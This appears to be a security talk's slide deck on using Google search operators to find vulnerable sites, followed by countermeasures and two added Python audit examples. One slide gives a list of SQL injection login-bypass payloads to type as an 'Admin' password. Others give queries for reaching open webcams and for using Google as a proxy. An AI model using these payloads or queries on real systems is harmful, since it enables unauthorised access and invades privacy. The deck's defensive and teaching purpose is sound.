Google and Beyond: Advanced Search Engine Hacking and Web-Based Intelligence Gathering
By Manish Kumar, Founder & CEO, Rooman Technologies Pvt Ltd

AGENDA
How Google works
Information disclosure with Google
Tools
Countermeasures

Google Hacking
Web Hacking: Pick a site, find the vulnerability.
Google Hacking: Pick a vulnerability, find the site.
Don't Be A Target of Opportunity

How Google Works
Googlebot, a web crawler that finds and fetches web pages.
The indexer that sorts every word on every page and stores the resulting index of words in a huge database.
The query processor which compares your search query to the index and recommends the documents that it considers most relevant.

How Google Works
SERVER SIDE / CLIENT SIDE

How Googlebot Works
Googlebot finds pages in two ways:
through an add URL form, www.google.com/addurl.html
through finding links by crawling the web.

Indexer and Query Processor
Indexer
Googlebot gives the indexer the full text of the pages it finds.
These pages are stored in Google's index database in alphabetic order.
Each index entry stores a list of documents in which the term appears and the location within the text where it occurs.
Query Processor
Page Ranking puts more important pages at high rank.
Intelligent Technique for learning relationships and associations within the stored data
Spelling Correcting System

So What Determines Page Relevance and Rating?
Exact Phrase: are your keywords found as an exact phrase in any pages?
Adjacency: how close are your keywords to each other?
Weighting: how many times do the keywords appear in the page?
PageRank/Links: How many links point to the page? How many links are actually in the page?
Equation: (Exact Phrase Hit) + (Adjacency Factor) + (Weight) * (PageRank/Links)

The Basics
To set the stage for what I will demo, it is necessary to understand some of Google's advanced search functions. This will not be an exhaustive list, just an intro. Creative use of these functions is the key to successful Google Hacking.

The Basics
Some important things to keep in mind:
Google queries are not case sensitive.
The * wildcard represents any word. Example: * insurance quote
Google stems words automatically. Example: automobile insurance quote brings up sites with "auto".

The Basics
The + symbol forces inclusion of a certain word. auto insurance +progressive
The - symbol forces exclusion of a certain word. (Site:progressive.com site:www.progressive.com)
The | symbol provides boolean OR logic. auto insurance + inurl:(progressive | geico)

Information Disclosure with Google
Advanced Search Operators
site: (.edu, .gov, foundstone.com, usc.edu)
filetype: (txt, xls, mdb, pdf, .log)
Daterange: (julian date format)
Intitle / allintitle
Inurl / allinurl

Advanced Operators
link:URL = lists other pages that link to the URL.
related:URL = lists other pages that are related to the URL.
site:domain.com search term = restricts search results to the given domain.
allinurl:WORDS = shows only pages with all search terms in the url.
inurl:WORD = like allinurl: but filters the URL based on the first term only.
allintitle:WORD = shows only results with terms in title.
intitle:WORD = similar to allintitle, but only for the next word.
cache:URL = will show the Google cached version of the URL.

The Basics
Let's take a look at a few of the interesting Google search commands.

The Basics
There are many more advanced operators. Combining these creatively is the key to Google Hacking.
http://www.googleguide.com/advanced_operators_reference.html

BUT DO YOU REALLY NEED TO REMEMBER IT

Advanced Search with Google

INTERESTING SEARCHES
Now that we've gotten this boring stuff out of the way, let's introduce some Google hacks.

Google and Proxy
Use www.google.com/translate_t to by-pass Internet Browser Security Settings.
Find a proxy that works, and enter in the URL
inurl:nph-proxy.cgi start using cgiproxy
inurl:nph-proxy.cgi Start browsing through this CGI-based proxy

Gaining auth bypass on an admin account
There are a large number of Google dorks for basic SQL injection:
' or '1'='1 ' or 'x'='x ' or 0=0 -" or 0=0 -or 0=0 -' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1--
Keep the username as "Admin" and for the password type one of the following:
" or 1=1-or 1=1-' or a=a-" or "a"="a ') or ('a'='a ") or ("a"="a
hi" or "a"="a hi" or 1=1 -hi' or 1=1 blah 'or'1=1'

Few more interesting Searches
Browsing images of the site
Site: xxxxxxx in Google image
Browse Live Video Cameras
inurl:viewerframe?mode=motion (http://184.108.40.206:555/ViewerFrame?Mode=Motion&Language=0)
Intitle:Live View / - AXIS
Browse Open Webcams Worldwide
Axis Webcams: inurl:/view.shtml or inurl:view/index.shtml
Canon Webcams: sample/LvAppl/
Server versioning
intitle:index.of server at

Tools
Google Hacks
Goolag Site Scanner
Site Digger
Gooscan
Goolink Scanner
Athena

GOOGLE HACK
Google Hacks is a compilation of carefully crafted Google searches that expose novel functionality from Google's search and map services.
You can use it to view a timeline of your search results, view a map, search for music, search for books, and perform many other specific kinds of searches.
You can also use this program to use Google as a proxy.

GOOGLE HACK SCREEN SHOT

GOOLAG SCANNER
Goolag Scanner enables everyone to audit his/her own web site via Google.
It uses one XML-based configuration file for its settings.

Screenshot of GOOLAG SCANNER

SITEDIGGER
Automated Google hacking tool from Foundstone
Uses Google API
Uses Google Hacking Database
SiteDigger searches Google's cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on websites.

Screen shot of SITE DIGGER

Countermeasures
Keep sensitive data off the web!!
Do not display detailed Error Message
Do not allow Directory Browsing
Perform periodic Google Assessments
Update robots.txt (For examples and suggestions for using a robots.txt file, see http://www.robotstxt.org)
Use meta-tags: NOARCHIVE
http://www.google.com/remove.html
This is bad!

How To Protect Your Websites From Google Hackers
Use a robots.txt file to prevent Google and other search engines from crawling your site if it shouldn't be crawled.

ROBOTS.TXT Example
This example allows all robots to visit all files because the wildcard "*" specifies all robots:

    User-agent: *
    Disallow:

This example keeps all robots out:

    User-agent: *
    Disallow: /

The next is an example that tells all crawlers not to enter four directories of a website:

    User-agent: *
    Disallow: /cgi-bin/
    Disallow: /images/
    Disallow: /tmp/
    Disallow: /private/

Robots.txt Cont..
Example that tells a specific crawler not to enter one specific directory:

    User-agent: BadBot # replace the 'BadBot' with the actual user-agent of the bot
    Disallow: /private/

Example that tells all crawlers not to enter one specific file:

    User-agent: *
    Disallow: /directory/file.html

Note that all other files in the specified directory will be processed.

Example demonstrating how comments can be used:

    # Comments appear after the "#" symbol at the start of a line, or after a directive
    User-agent: * # match all bots
    Disallow: / # keep them out
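
An added example, not part of the original slides: Python's standard urllib.robotparser evaluates the deck's robots.txt rules against a constructed list of sensitive paths, showing which ones a compliant crawler may still fetch and which directory names the public file itself reveals. The path inventory and the helper names are assumptions made for illustration.

```python
from urllib.robotparser import RobotFileParser

# The deck's "four directories" policy combined with its BadBot rule.
ROBOTS_TXT = """\
User-agent: BadBot
Disallow: /private/

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /tmp/
Disallow: /private/
"""

# Constructed inventory of paths on a hypothetical site that should not be indexed.
SENSITIVE_PATHS = ["/private/report.xls", "/cgi-bin/admin.cgi",
                   "/backup/db.mdb", "/logs/access.log"]

def load_policy(text):
    """Parse robots.txt text offline (no network fetch)."""
    parser = RobotFileParser()
    parser.parse(text.splitlines())
    return parser

def crawlable(policy, agent, paths):
    """Return the paths a compliant crawler identifying as `agent` may still fetch."""
    return [p for p in paths if policy.can_fetch(agent, p)]

def disclosed_prefixes(text):
    """List every Disallow prefix; robots.txt is public, so anyone can read these."""
    found = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()       # drop trailing comments
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            found.add(value.strip())
    return sorted(found)

if __name__ == "__main__":
    policy = load_policy(ROBOTS_TXT)
    for agent in ("Googlebot", "BadBot"):
        print(agent, "may still fetch:", crawlable(policy, agent, SENSITIVE_PATHS))
    print("Paths advertised by robots.txt:", disclosed_prefixes(ROBOTS_TXT))
```

The BadBot group replaces the * group for that crawler rather than adding to it, so BadBot is only kept out of /private/. robots.txt binds only crawlers that choose to honour it, which is why the first countermeasure remains keeping sensitive data off the web.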
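
An added example, not from the original deck, for the countermeasures listed earlier: it checks response bodies from your own site for an open directory listing, a server version banner, a detailed error message, and a missing NOARCHIVE meta tag. The sample pages, the error signatures and the function names are constructed assumptions.

```python
import re
from html.parser import HTMLParser

class HeadScanner(HTMLParser):
    """Collects the <title> text and any robots meta directives."""
    def __init__(self):
        super().__init__()
        self.title, self.robots, self._in_title = "", set(), False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "meta" and (a.get("name") or "").lower() in ("robots", "googlebot"):
            self.robots |= {d.strip().lower() for d in (a.get("content") or "").split(",")}
    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
    def handle_data(self, data):
        if self._in_title:
            self.title += data

# Assumed signatures; extend with the error formats your own stack emits.
ERROR_PATTERNS = [r"Traceback \(most recent call last\)", r"Warning: \w+\(\)",
                  r"SQL syntax.*MySQL", r"ODBC .*Driver"]
BANNER = re.compile(r"(Apache|nginx|Microsoft-IIS)/[\d.]+[^<]* Server at ", re.I)

def audit_page(html):
    """Return the findings for one response body fetched from your own site."""
    head = HeadScanner()
    head.feed(html)
    findings = []
    if head.title.strip().lower().startswith("index of"):
        findings.append("directory-listing")            # what intitle:index.of matches
    if BANNER.search(html):
        findings.append("server-version-banner")        # what "server at" matches
    if any(re.search(p, html, re.S) for p in ERROR_PATTERNS):
        findings.append("detailed-error-message")
    if not ({"noarchive", "noindex"} & head.robots):
        findings.append("cacheable-by-search-engines")  # no NOARCHIVE meta tag
    return findings

# Constructed sample responses.
LISTING = ("<html><head><title>Index of /backup</title></head><body><a href='db.mdb'>db.mdb</a>"
           "<address>Apache/2.2.3 (CentOS) Server at www.example.com Port 80</address></body></html>")
ERROR_PAGE = ("<html><head><title>Error</title><meta name='robots' content='noindex, noarchive'>"
              "</head><body>You have an error in your SQL syntax; check the MySQL manual</body></html>")
HARDENED = "<html><head><title>Login</title><meta name='robots' content='noarchive'></head><body>Sign in</body></html>"
```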

Few interesting Websites
www.archive.org: Archive of websites (Time Machine)
www.readnotify.com: Find out when your email gets read, Retract, Certify, Track & much more
www.guerrillamail.com: provides you with disposable e-mail addresses which expire after 15 minutes
www.gorillaemail.com: Email Marketing solutions that allow you to Send, Track and Confirm delivery of Emails, Newsletters, Events etc.

QUESTIONS ????

THANK YOU
Manish Kumar, CEO, Rooman Technologies
Email: [email protected]
Ph: 080-40445566